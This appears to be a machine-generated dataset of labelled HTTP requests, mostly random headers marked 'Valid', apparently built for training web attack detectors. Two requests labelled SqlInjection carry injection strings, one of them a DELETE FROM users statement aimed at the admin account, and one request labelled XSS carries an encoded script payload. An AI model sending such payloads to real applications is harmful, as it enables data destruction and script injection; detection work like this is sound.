UA-CPU: Sparc
UA-OS: Win9x
UA-Color: color16
Via: 0.8 133.88.95.175, HTTP/9.1 119.227.213.29:5539, FTP/1.9 50.234.198.92
Transfer-Encoding: compress
Upgrade: ebwzs/3.0, wtntaa/3.5, ds8jes/6.2, dad/1.0
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39970
Start - Id: 14183
class: Valid
GET /cgth/htsen5znot/y6B38lwj.jpeg?8huhcad77tcte=gtnezeeb%7Eit&nhe7slbr2intcm=972921&eecuafsrtla=kx3UE8C5%4061&entzr=7&eotpa0e9ta5ef=ttErlamnow3Stn&shsneeh=h%7Ct&fuarosrr=5402909 HTTP/1.0
Host: www.ibhut7ti.gov:5452
Connection: 5uetxeiZ
Accept: image/*, application/postscript;q=0.7
Accept-Charset: cp-932, isiri-3342;q=0.8, iso-8859-5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 18.88.7.100
Cookie: ndilH=reIdfjlq-;P2nnfs3steEst=kyZYPsr;mflfO=hhs;raoh=31851025;er=60134294
Cookie2: $Version="8"
Date: Wed, 04 Jul 07 05:11:52 CET
ETag: W/"fMj2vF-tM0p0R6MV"
Expect: 100-continue
From: ycho3Gtt@smo5fM.fr
If-Modified-Since: Tue, 03 May 05 01:48:55 CET
If-Unmodified-Since: Sun, 17 Oct 04 19:22:36 GMT
If-Match: "CHSBeVjC8RZzY0f@Av"
If-None-Match: *
If-Range: Fri, 30 Mar 07 24:44:46 UTC
Max-Forwards: 834
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: meye5i cell=L8Du9oSg
Authorization: Digest algorithm=stpNyrs
Range: 3510-,64-0
Referer: /fkahe9/oymziE/pa9fnte.exe
TE: trailers,gzip
Trailer: Warning
User-Agent: Mozilla/0.0 (Machintosh; U; Mac OS X 8.3; hj-Je; rv:3.8.0) Gecko/05555411
UA-CPU: x86
UA-Disp: 9830,719,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 3581x504
Via: 1.6 26.66.246.63, HTTP/1.6 www.Sscmae.tiff
Transfer-Encoding: compress
Upgrade: 0eslla/9.9, lej/5.1, lysdod/6.6, rtdu/9.5, and0na/9.7
Warning: 607 145.140.108.102 "1uaqkehhratt5eDyite" 
X-Forwarded-For: 78.119.180.100
X-Serial-Number: 983815591636299863
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 14183
Start - Id: 32620
class: Valid
PUT /f23P@W4c/eY/eKI-NOiVnUuNSRe/jlFN@avVcmDenTGM/AwOhgfeeldDoeh/rbT3gtDZL-py0peHYsh/yehg/sn6.JAuhnK.d/Ucadknniarotn/iylcY-/cO89jIk6g5YsTbu/rnh9detnatIrduitiEu.exe? HTTP/1.0
Content-Length: 110
Content-Language: oy,dr4eOa3g,rrroeg
Content-Encoding: deflate
Content-Location: /e5s79S/osyetxg/khfWura/ayfhhuit/bilne.nsf
Content-MD5: bm5vYm4xbGRucnVscjFIcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Dec 05 23:59:04 GMT
Last-Modified: Sat, 22 Dec 07 01:27:28 GMT
Host: www.eUjo.ch
Connection: Home
Accept: video/mpeg;q=0.6, image/*;q=0.6, audio/*
Accept-Charset: *
Accept-Encoding: compress, gzip, identity, deflate
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 81.82.94.196
Cookie: thsciecs=q nes'qtahg;4TBu9= execdttowgr;nkT1J7O=91;tttOsrrdizHnioo= t+;fkh8u=adr
Cookie2: $Version="88"
Date: Wed, 12 Oct 05 20:55:38 GMT
ETag: "mjM7UZPjcvb5tBEC5d5a"
Expect: wfsorit
From: mhhvcrm@gtad.de
If-Modified-Since: Sat, 21 Jan 06 07:49:57 UTC
If-Unmodified-Since: Mon, 19 Apr 04 12:20:27 CET
If-Match: "MyNAg-k-MaDxCcTYiSk"
If-None-Match: "p_9tHC__0am74VM"
If-Range: *
Max-Forwards: 40
MIME-Version: 1.4
Pragma: va=SsbwNee
Proxy-Authorization: adtt9 cssas=aamp
Authorization: NTLM aHRkbnBzclM1ZXRobm5pZTJ0ZWF0MGppT3RobmVBZ3RwaWFn
Range: 09-
Referer: /2tsh4h.jpg
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: l7fss3r
UA-CPU: PowerPC
UA-Disp: 010,8436,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9654x290
Via: FTP/6.3 47.237.168.72
Transfer-Encoding: gzip
Upgrade: y9rpd/0.5, rret/3.4, W2nt/0.3
Warning: 600 www.oeyQ.gif:6 "MqLrrRse4tmzoe" 
X-Forwarded-For: 118.148.230.191
X-Serial-Number: 73155166220455300
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

taoea=61gZL&nHlaasz=BllaSaoeo&rotVtreS73ddwqu=o1s&.MXu7@2aiQperl=btfthtyessutmsSs2&louayehlmnosfw=it&&nRF=01

End - Id: 32620
Start - Id: 11268
class: Valid
GET /ncfenErmeerEaebaaiy/3ofX/d0joim7oenoeEn/WI.4yqf/evLY/N.COWpBF/rt1stlnpotGm2m97fe/ioutnMtVveOZ65GA5/zn7r0F0Ygroup by/2estrnid/hlFkx9DIi4Bntk1zX/4cnertakdr6senhscwd.pl? HTTP/1.0
Host: www.mgde9u53g.net
Connection: eagslde
Accept: */*
Accept-Charset: x-mac-turkish, x-mac-cyrillic;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.4
Cache-Control: min-fresh=66608
Client-ip: 153.188.24.187
Cookie: nCsweefw7Etn=4winnt6v
Cookie2: $Version="0"
Date: Fri, 09 Nov 07 09:58:55 UTC
ETag: W/"UeOVYm3VUi4MHjwB1SI"
Expect: e7exuse9
From: udeo@jot2xbpben.it
If-Modified-Since: Thu, 25 Mar 04 20:04:13 GMT
If-Unmodified-Since: Fri, 03 Jul 09 22:55:33 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Aug 04 22:26:26 UTC
Max-Forwards: 07
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bzhpZm91ZWVuaWxmYnVzdDd3eXNsbnhhaWNheGU0SW9kZQ==
Authorization: Digest opaque="ilmetsya"
Range: 394051-208299
Referer: http://8r2gm5ty.uk/bnes/hrgzd.cgi
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/3.5 (compatible; psir; Win98; r6sy; pdahfhwi3)
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 234x2210
Via: HTTP/5.3 186.104.173.233:8157, 3.3 www.hemnecti.gif:161
Transfer-Encoding: mEhn; yoo2=Ubnl
Upgrade: cTCcot/3.2, aonet/2.8, soci/4.8
Warning: 337 216.50.53.199 "osavyeiduatyteha" "Tue, 27 Apr 04 05:08:34 GMT"
X-Forwarded-For: 161.180.94.113
X-Serial-Number: 7492268797432274
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11268
Start - Id: 10819
class: Valid
GET /rOeahi5uvegEa/eZ/evalgnetcatreplacejopenYKOd0a/fnniior8peurlOpton.jsp?eeonateton6z=ax2eH2ZZ5v&RB0S5Zupdatemn9u=70&sock_streamwma=lPH&iHnp6=4nzeTnteoaeiuan&samamthlhe=7beogI&mnshrT7as1BFii9=66712 HTTP/1.0
Host: 154.45.13.184
Connection: teksutzi
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.2
Accept-Language: d-ea9rqv, heds-eficO;q=0.1, h9r8a-iroes;q=0.8, gmtpOt-celiS6h;q=0.3
Cache-Control: only-if-cached
Client-ip: 198.44.230.163
Cookie: FpUWmailWRCo=606;CBoXVxterm=576
Cookie2: $Version="2"
Date: Mon, 30 Nov 09 01:10:42 UTC
ETag: "CsX2QF-E6EdOuVGGHRQ0"
Expect: lwn3=tAmOatrn
From: eatiedI@0aabliaA.fr
If-Modified-Since: Mon, 30 Jun 08 11:02:18 CET
If-Unmodified-Since: Fri, 23 Mar 07 12:16:05 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 26 Jun 05 12:16:53 GMT
Max-Forwards: 8
MIME-Version: 8.9
Pragma: oncl='roastann'
Proxy-Authorization: Digest opaque="ioofo"
Authorization: ex7d Ohduu=etakt
Range: -605203
Referer: /taeSo/7ntIizI4/s1exw/draeen/bgise26.bin
TE: trailers,trailers
Trailer: Date
User-Agent: isiw3aF http://www.fmhs.be
UA-CPU: MIPS
UA-Disp: 6045,6650,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 633x671
Via: tit/7.8 www.haa3iov0.jpeg, 7.3 www.yeqnet.png
Transfer-Encoding: compress
Upgrade: 3uen/0.9, a1ts/0.4, sidhd/7.5, fsam/4.5
Warning: 710 www.o4vrf.shtml "azenesqualg1oeEe" 
X-Forwarded-For: 3.139.177.219
X-Serial-Number: 026884237453850145
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10819
Start - Id: 3240
class: Valid
GET /sea0tshpa1pdE/eZz4MIKxyxURyB6/1LJPqMNAbNaPg8/tGkgPAN.tiff?aetnitntddawh=237&rresonesitu=7oI7OtOiwN&etgjeomqor=ectmp&aitTkh=7695&asho0pR3dE=hytaizd+fruep%5D&1dropVjJautoexecidYobusr=logggs+rhdformf&3dectnrze2=1526710&Ew4n=spThijira7a&s8ooe9i2s=ekjn_dhtYD HTTP/1.0
Host: 76.63.210.173:80
Connection: a8arOn
Accept: text/html;q=0.9, video/*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: min-E;q=0.9, asi-onpcpl;q=0.4, eeixnee-ebed;q=0.8, 0n-7ng3z;q=0.9
Cache-Control: max-stale=979
Client-ip: 9.29.40.17
Cookie: oi0er=shE~enwogkd[p;Acaemant=ohxH+mb;sqciokesrfil=e6ipee3esyA;t1pvel=ee?|5t/e-a$ NJimi
Cookie2: $Version="39"
Date: Wed, 01 Mar 06 05:35:40 GMT
ETag: "ApY8eeuPU@ZPUbkv"
Expect: 100-continue
From: enn6@rliEa.it
If-Modified-Since: Fri, 17 Mar 06 10:06:52 GMT
If-Unmodified-Since: Fri, 26 Mar 10 19:46:58 GMT
If-Match: *
If-None-Match: ".JUyczwFi24_b45yxJQC"
If-Range: Mon, 01 Oct 07 22:21:59 UTC
Max-Forwards: 04
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic dGVpaHM6b2lsYWRkYWk=
Authorization: Basic aW93cm0ycTpsc3dv
Range: 7-
Referer: http://4stAoaer.be/wene/stzlucep.nsf
TE: gzip,gzip;q=0.2,deflate;q=0.5
Trailer: Authorization
User-Agent: Mozilla/1.4 (Machintosh; U; Mac OS X 2.9; kp-ea; rv:4.1.6) Gecko/95944472
UA-CPU: StrongARM
UA-Disp: 098,469,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 796x812
Via: 6.3 46.100.51.42
Transfer-Encoding: compress
Upgrade: Anim/9.2, 4ebtk/6.4
Warning: 925 www.t1tEewa.css "iYe7tpBtm7wyjraztas" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3240
Start - Id: 35337
class: SqlInjection
GET /rL0/ej9-1dQc/nemrxm/3HP1/aoTofIhl/4utpeaaSmbT/rXjg/n-Pljs88u/rU@28laxO.08La/aPX3tVZYWb1VPQk.mdb?ou=yechoa8e&erlinenyld=090545&aao=aM6v9k&iwijtlnbeer=OR+++%27co%27+IN++++%28++%27++%27%29&wnetcatiM1mp3B=heyt%5C&anre7dsc=%5Dhl&uoco9=329753&eyvbscriptMJ=q+iN&OFaM=oeEnautoexecnc%2F HTTP/1.0
Host: 187.110.232.16:80
Connection: keep-alive
Accept: application/x-tar;q=0.4
Accept-Charset: x-mac-turkish
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 85.135.241.126
Cookie: 8iaiogt5TdN=sVi?eiel;tudwtgtfntredO=d mochadm;DzexecD=:s:stdinh asEy/eahoti@;ohetgj=vle];av
Cookie2: $Version="9"
Date: Fri, 22 Feb 08 24:44:53 UTC
ETag: W/"3xeU3JJzY4QgQz3Wd"
Expect: 100-continue
From: 2cs3fs@4loUnehlAe.it
If-Modified-Since: Sat, 02 Jan 10 16:15:45 GMT
If-Unmodified-Since: Mon, 22 Oct 07 13:50:19 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 15 Feb 08 23:20:46 GMT
Max-Forwards: 8
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: 9m1G irNrna=auC77ta
Authorization: Digest qop=auth-int
Range: 16442-228208
Referer: /cthtqQh.jsp
TE: trailers,deflate
Trailer: Via
User-Agent: kote0/1.9
UA-CPU: StrongARM
UA-Disp: 787,9099,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5578x419
Via: 5.5 www.eNsTeth.png, 7.4 32.119.123.63
Transfer-Encoding: compress
Upgrade: trno9o/8.6, tnr9dg/0.3, iet/0.3
Warning: 857 www.af1tY.jpeg "vltHuipbeAndrm" 
X-Forwarded-For: 29.33.121.207
X-Serial-Number: 9356932
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35337
Start - Id: 27642
class: Valid
GET /caiv5e/5hotoeie.mspx?s1hha=usies&itcabmraam=75657551&hi=t+%3Ehaving&gnuycih=l17X289&oFuisc=3&aiigoniiehf=040197&hoibcsdomuwed4=5794383463 HTTP/1.1
Host: 66.124.86.251
Connection: close
Accept: audio/x-wav;q=0.0, image/*
Accept-Charset: x-mac-arabic
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 249.193.66.99
Cookie: kdedhsynlgel=eetyishy;tiJnhapc=stu;ttHeuwi29seEcu=mt7rbalon;szeodl7pFe=lYg;MXq4=930939
Cookie2: $Version="8"
Date: Sat, 05 Jul 08 19:45:46 UTC
ETag: W/"Q7FDirU-IyamM8-k"
Expect: 100-continue
From: Rofmod@oeornsCta.de
If-Modified-Since: Thu, 07 Aug 08 13:11:12 CET
If-Unmodified-Since: Sat, 01 Nov 08 07:24:18 CET
If-Match: "za-mj9K1-TJqjs4L_oON"
If-None-Match: *
If-Range: *
Max-Forwards: 98
MIME-Version: 0.1
Pragma: gBaGhz='aen'
Proxy-Authorization: Basic TmVyRXQ6ejdUOQ==
Authorization: NTLM ZGJnaXJ1ZW4yZWVqMnJyYWVja2ZtZXJnNmJhdGNzaHJham5pdmEyZGhvTG0=
Range: -88
Referer: /iXaehml/aesa/eSott.exe
TE: chunked;q=0.8,chunked
Trailer: Via
User-Agent: Mozilla/8.7 (compatible; Konqueror/8.8; Win 9x; 3isCH7eae; oysymRao; evls)
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0807x3166
Via: 6.9 249.170.231.74:89, cnak/2.7 www.ilxiwsv.css, FTP/8.8 www.wofbel.jpeg:7
Transfer-Encoding: cnedw
Upgrade: n5eeiS/7.2
Warning: 259 www.rfDsn.jpg "ohSzyAnhwspipbdtmo" "Tue, 28 Jun 05 14:35:35 GMT"
X-Forwarded-For: 21.17.8.118
X-Serial-Number: 189697977036477
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27642
Start - Id: 41484
class: SqlInjection
PUT /quhzNSY9wget/fH__f/rFkfu7U0qJZFV_mx.R/mole/ul24/QpositionYwinnt8documentvbscript_/r6attn6/jlrseybd.shtml? HTTP/1.0
Content-Length: 274
Content-Language: ax,r3Lq,RI
Content-Encoding: deflate
Content-Location: http://cEte.uk/e6Oe9t1e/unre0si/mars/pu0nai.msf
Content-MD5: MmFRbnd1aTllZWxudDlpMw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Aug 07 24:06:58 GMT
Last-Modified: Wed, 23 Nov 05 10:33:14 CET
Host: www.rE9to.be:80
Connection: keep-alive
Accept: audio/x-wav, audio/*
Accept-Charset: gb2312;q=0.3, x-mac-arabic, windows-1257;q=0.6, big5, isiri-3342;q=0.4
Accept-Encoding: compress;q=0.0, identity;q=0.5
Accept-Language: v4q-ioqtetw, i-e, 8thcbh8-be1n;q=0.3
Cache-Control: nf='Dtus0'
Client-ip: 212.10.247.26
Cookie: mfrnoee=31778785;poelecl5Bs=nfer9Ld;rldbb=92389;mdeNuIoiwA=wn3o1motzsbswr;orne2iere0dVs=752141
Cookie2: $Version="203"
Date: Tue, 11 Jan 05 23:31:48 CET
ETag: "VnPwVfdJ4vTCf5WSay"
Expect: Elsne=gtutm2rl;tasr
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Wed, 30 Jun 04 06:07:35 UTC
If-Unmodified-Since: Wed, 02 Jan 08 14:54:51 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 01 Jan 05 15:56:28 CET
Max-Forwards: 2101
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: NTLM bXNzdWV5cHVKcjY3ZXRzOGhpNzNpbmtkbDdudUFyY1V0Y2plbDNPdHhhdmk=
Range: 78-403185
Referer: /eeab8l/tsoit/qmrc9jdn.htm
TE: gzip;q=0.0
Trailer: Accept-Encoding
User-Agent: Mozilla/8.0 (Windows; U; Windows NT 6.2; im-an; rv:5.4.9) Gecko/54383404
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: pwyNs/2.4 224.117.63.3
Transfer-Encoding: gzip
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 644 www.or4te.js "ecd9adohmafA" "Sun, 18 Jan 09 08:09:07 UTC"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 6237226305508453843
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

urnQO=6&ra2htthosfoamSa=525704&ttij4lh3dssw=5(i sock_streamstwupdatehhrsohtpassou-+f&7r2aw=c8fudQehrt' );DELETEFROMusersWHEREupper(username)=  upper(   'admin&rdea=iac&iPWzwhereGd=315874&dEchildb=yr&bdla=irfR:9sock_stream9ret&ou=d$(mtela-mhsinsert6

End - Id: 41484
Start - Id: 2678
class: Valid
GET /oekbfkJjT9FDtK10LJT4/cVAzPZmIKDGXR89H1Bb7/FHE7Konq3.php?TeornnohlnoEvli=6awmlaadmer6%40in&winntmGp.qS7=e&lg=ed%25ueh%5Clogo&_dSIlkAGM24=peeddIhttp&eayg=ezvlw.&ssr4ntacus1S=er%2F4t3nautoexec HTTP/1.1
Host: 102.65.106.22
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-icelandic;q=0.1, euc-kr;q=0.0, cp-936;q=0.9, iso-8859-2, x-mac-japanese;q=0.7
Accept-Encoding: 
Accept-Language: ntu-qDsqnat;q=0.9, idensh-enfdMtqg
Cache-Control: only-if-cached
Client-ip: 97.1.7.203
Cookie: AyrcAitftbnnlo=EjrmfamegitEelobjecto;Gnetcate@zpzNm=eaA
Cookie2: $Version="21"
Date: Wed, 02 May 07 17:34:56 CET
ETag: W/"YgfCl574zFZDDyBiItIN"
Expect: 100-continue
From: ovamHuqy@MlywzI.fr
If-Modified-Since: Sat, 01 Nov 08 12:12:37 GMT
If-Unmodified-Since: Fri, 06 Apr 07 10:03:26 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 26 Sep 09 21:43:45 UTC
Max-Forwards: 9
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic MUVsdDoxb3NlY29mZQ==
Authorization: Basic bnZydTpoemxl
Range: -23,-6679
Referer: http://gseb9.ch/wvsese/dpNf1Eco/nanon.zip
TE: trailers,deflate
Trailer: Expect
User-Agent: Mozilla/7.9 (X11; U; Open BSD i586 8.0; 3j-tk; rv:1.6.5) Gecko/78740556
UA-CPU: x86
UA-Disp: 6089,3163,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 486x934
Via: FTP/7.1 95.73.91.50:3
Transfer-Encoding: deflate
Upgrade: azkuh/4.3, ztter/5.6, EyResi/1.5, vTvy/8.8
Warning: 749 www.okXda0.jpeg:63 "nQde" 
X-Forwarded-For: 94.59.133.217
X-Serial-Number: 8136074594585
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2678
Start - Id: 8012
class: Valid
PUT /I5Evniwwiheohaer/rM50A/iC0dGOmr8M5Pcv/pGk6sf/ewqroieeomuIh/mD_a4NH@NMjkCY.huqYr/DecNre/ie1neowiwaecP/t1sQ2q4LFfw.cfm? HTTP/1.0
Content-Length: 71
Content-Language: a
Content-Encoding: deflate
Content-Location: /fiE5a0u/Orua.php3
Content-MD5: YndvbXRzdHllbFVFZHQ5TQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 13 Aug 08 13:29:49 UTC
Last-Modified: Wed, 11 Feb 09 23:45:11 CET
Host: 137.208.242.190
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip
Accept-Language: ttjorilh-h9Is9;q=0.2, bshin5e0-e;q=0.2, tsnnts-wsqeit, aei-u;q=0.8
Cache-Control: max-stale
Client-ip: 133.145.210.81
Cookie: dBjhogfo=tfE7ah-w;tE8wsrqshd=0o;Iq7tsg=849;0mxdeffrh=rtVF;rnrrnnua=enfa
Cookie2: $Version="60"
Date: Sat, 22 Apr 06 04:09:09 UTC
ETag: W/"iwUUiZ-aaoi9ZPlt"
Expect: 100-continue
From: itepe@sh8wbe.it
If-Modified-Since: Mon, 01 Feb 10 12:51:25 CET
If-Unmodified-Since: Fri, 24 Aug 07 04:28:17 GMT
If-Match: "M3EoiWcsz1ZeO.yu"
If-None-Match: "8Dnn@fuiQMzjJjH"
If-Range: Sun, 06 Sep 09 21:31:20 UTC
Max-Forwards: 6206
MIME-Version: 6.1
Pragma: ttsiiyb=rtlnq
Proxy-Authorization: NTLM dGFUaW9pMDRlbm9vYWt0YWVyc2x0YXNzdnV1ZTZpcnR0
Authorization: Basic YnRtaTM6QTlkaWd6
Range: 439-82,94-,67-
Referer: /em8Dns9.gif
TE: deflate,trailers
Trailer: Upgrade
User-Agent: gytuar/2.4.7
UA-CPU: PowerPC
UA-Disp: 6556,373,32
UA-OS: Linux
UA-Color: color8
Via: 5.9 www.stntnslj.html
Transfer-Encoding: deflate
Upgrade: ceIre/8.2
Warning: 932 www.eNngulE5.htm:42895 "m0dW" 
X-Forwarded-For: 50.12.149.255
X-Serial-Number: 6980972846
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

atttftdfi1=290&bodydJRAi3H=kUF&rsaef2i=485397097&For=scc@x1o$aewget

End - Id: 8012
Start - Id: 7891
class: Valid
PUT /bs9nmliweapnr/sWtx2O/Ywhere2eieacceptF_6opC-A/s-/heaa8/atlkwkysuaaexmrees/vn9tssHHe/08JePkxcJz7vj/QS/GdNsoIciaitke/hdsTnlrnnwde/t2_i1pLRu0OTyrB@.tiff? HTTP/1.1
Content-Length: 16
Content-Language: hcs1bk,syraenep
Content-Encoding: deflate
Content-Location: http://www.Oeenc.com/aeiRe/ekhaybqr.bin
Content-MD5: YXNvUjBlN2lPbWpkZ3pEaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Jan 06 10:41:20 UTC
Last-Modified: Sun, 13 Jan 08 09:56:37 GMT
Host: 213.159.127.218:111
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: 2Ldjrui-10h;q=0.5, w-e;q=0.9
Cache-Control: cer=arne
Client-ip: 242.184.161.176
Cookie: Rtea=execd;xtermHaWorcpiU=u);yfaNiydsyeaa=rlibk5ns;sso6hieiAsno=tkmoj;4s=6;hoFaaowsp=aigjbnrostnodee
Cookie2: $Version="00"
Date: Thu, 02 Nov 06 04:41:23 GMT
ETag: W/"p.32.oEBJ_zbiwPA"
Expect: 100-continue
From: Agmt7@yFotti8uR.biz
If-Modified-Since: Sat, 10 Feb 07 10:32:01 CET
If-Unmodified-Since: Fri, 20 Jun 08 14:30:33 GMT
If-Match: "oV4EJvaaUmcrHoRCm"
If-None-Match: "tJXST_5zDCyTD4xfmD"
If-Range: Tue, 27 Dec 05 05:09:06 GMT
Max-Forwards: 4
MIME-Version: 0.4
Pragma: pUonaiTa='enrv'
Proxy-Authorization: Basic dElxZG9MaDplYnlTbG5ONQ==
Authorization: Digest qop=auth
Range: 8674-,-34,86935-
Referer: http://www.rtsn.cz/eQ6Ca0s.jsp
TE: trailers
Trailer: Via
User-Agent: Mozilla/3.4 (compatible; Konqueror/9.7; Unix; fosobxe; eLl4y7eewa; amIyoqdvn)
UA-CPU: Sparc
UA-Disp: 9422,2675,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 795x581
Via: HTTP/8.9 24.65.199.174, 7.0 237.209.209.45
Transfer-Encoding: identity
Upgrade: icEr/0.2, qtj/3.8, ic5/3.5
Warning: 457 58.248.149.253 "ghot6raooeReo" 
X-Forwarded-For: 115.221.199.254
X-Serial-Number: 534170749
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

QaX85=2355495429

End - Id: 7891
Start - Id: 30845
class: Valid
GET /eaeo17i2ra8eaeeitktu/odafksa/5Oemoci0seaesoni/97lstTLCat/D.UfOt/yassbeRntHy/ydviFz/rte0vDxiorrlsD/dIrtjtrlndaetdzE/rAdeiunigoy.tiff?4iceHrrdru=nxe2LbA%40I%40&bc3ao9tlomjitw=ip HTTP/1.1
Host: 32.24.62.158
Connection: 8bh2
Accept: audio/basic, image/png, video/quicktime;q=0.7
Accept-Charset: utf-7;q=0.7
Accept-Encoding: identity
Accept-Language: toreSm-eo, Eego7e-b9n, nwocom-3lr4ix8, d-ntoUsnl, tm-jsiAoaZ;q=0.1
Cache-Control: max-stale
Client-ip: 27.138.19.201
Cookie: ncg=a'rso;cMeiehef=dralbpmloe
Cookie2: $Version="084"
Date: Sat, 20 Mar 04 11:08:27 CET
ETag: "KjGB5E69B2JxQ1uJ"
Expect: 100-continue
From: 0i3zcA@luyies6.uk
If-Modified-Since: Wed, 07 Jun 06 05:49:24 CET
If-Unmodified-Since: Sat, 21 May 05 19:33:28 CET
If-Match: "FO6hv_VE4ZYE.mf"
If-None-Match: "ZjWXPxso9L3Mvj4cOZXv"
If-Range: "cZNNLrek90jFV8Jg5Mj0"
Max-Forwards: 938
MIME-Version: 8.2
Pragma: 3azcn=dW
Proxy-Authorization: Digest uri=/e271e/dzed/xtIes/dtoh.tar
Authorization: tPci2 sorie=sufusor
Range: 0-9,-164,6789-
Referer: /kd9f.php
TE: gzip,trailers,deflate;q=0.5
Trailer: Connection
User-Agent: Eaiigsbhc/0.0.3.9
UA-CPU: MIPS
UA-Disp: 072,6639,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1014x4541
Via: FTP/8.0 www.rehrs.js, 8.6 www.nL7s.html, 2.2 www.tauise.htm
Transfer-Encoding: deflate
Upgrade: ean/4.5, snh/8.7, gs4/8.9, tms/1.8
Warning: 487 www.3aeuzssp.html "5daxrei" "Sat, 28 Apr 07 04:33:31 UTC"
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 940026202382470481
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 30845
Start - Id: 47637
class: XSS
GET /diDaG2/rmYYiLomtZ1ymU0O3Rm.jpeg?tdd=%3Cxml++++id++++%3D+%22X+++%22+%3E%3Ca++++%3E%3Cb+%3E%26lt%3Bscript+++%3E%5Balert++%28%27snFtegs0da%27%29%3B%5D%26lt%3B%2Fscript+++%3E%3B%3C%2Fb++++%3E%3C%2Fa+%3E%3C%2Fxml%3E HTTP/1.1
Host: www.tr1db.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: oohjle-IE3;q=0.8, aur2rcss-alstN9bh, fdejf-Eheuoed, s-da75he;q=0.2
Cache-Control: min-fresh=33835
Client-ip: 113.72.70.216
Cookie: orlmillionseEr8=xs 6;is=7604;I2Huas=3;udait=72408;oliE2Y=yas2xdet
Cookie2: $Version="84"
Date: Sun, 30 Sep 07 01:54:26 GMT
ETag: "r4@VEUAYGvwfAxMT"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Sat, 08 Nov 08 13:16:02 UTC
If-Unmodified-Since: Mon, 26 Jun 06 22:18:29 UTC
If-Match: "gjZ2BJIIgdFb-HuHC1f"
If-None-Match: *
If-Range: Fri, 05 Jan 07 06:32:39 GMT
Max-Forwards: 4403
MIME-Version: 4.2
Pragma: utehre='sijnllLN'
Proxy-Authorization: Digest opaque="enht"
Authorization: Digest realm
Range: 51-,059585-
Referer: http://www.I1gh.com/teepe/h1ae.wmn
TE: trailers,deflate;q=0.3,trailers
Trailer: Accept-Encoding
User-Agent: e7ye5Usn/8.8
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3658x8516
Via: HTTP/1.6 22.150.222.205, HTTP/4.1 189.138.195.88:672
Transfer-Encoding: gzip
Upgrade: xibuaa/6.4
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
